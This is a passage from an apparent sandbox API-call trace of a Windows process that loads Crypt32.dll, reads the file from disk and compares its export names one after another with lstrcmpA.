lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0167.656] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0167.656] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0167.656] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0167.656] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0167.656] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0167.656] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0167.656] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0167.656] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0167.656] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0167.657] GetProcessHeap () returned 0x450000 [0167.657] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x2d42010 | out: hHeap=0x450000) returned 1 [0167.657] GetProcessHeap () returned 0x450000 [0167.657] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469240 [0167.659] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0167.681] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0167.681] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0167.681] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0167.682] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0167.682] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0167.682] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0167.682] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0167.682] GetProcessHeap () returned 0x450000 [0167.682] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c30e0) returned 0x4105040 [0167.687] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0167.687] ReadFile (in: hFile=0x160, lpBuffer=0x4105040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4105040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0167.970] CloseHandle (hObject=0x160) returned 1 [0167.971] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0167.971] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0167.971] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0167.971] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0167.971] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0167.971] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0167.971] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0167.971] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0167.971] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0167.972] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0167.972] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0167.972] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0167.972] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0167.972] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0167.972] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0167.972] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0167.972] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0167.972] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0167.972] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0167.972] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0167.972] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.972] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.973] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.974] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0167.974] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0167.975] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0167.976] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.976] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.976] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.976] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.976] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.976] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.976] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.977] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0167.977] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0167.977] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.977] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.978] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.978] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.978] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0167.978] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0167.978] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0167.978] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0167.978] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0167.979] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.979] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0167.980] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0167.980] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.980] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.981] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", 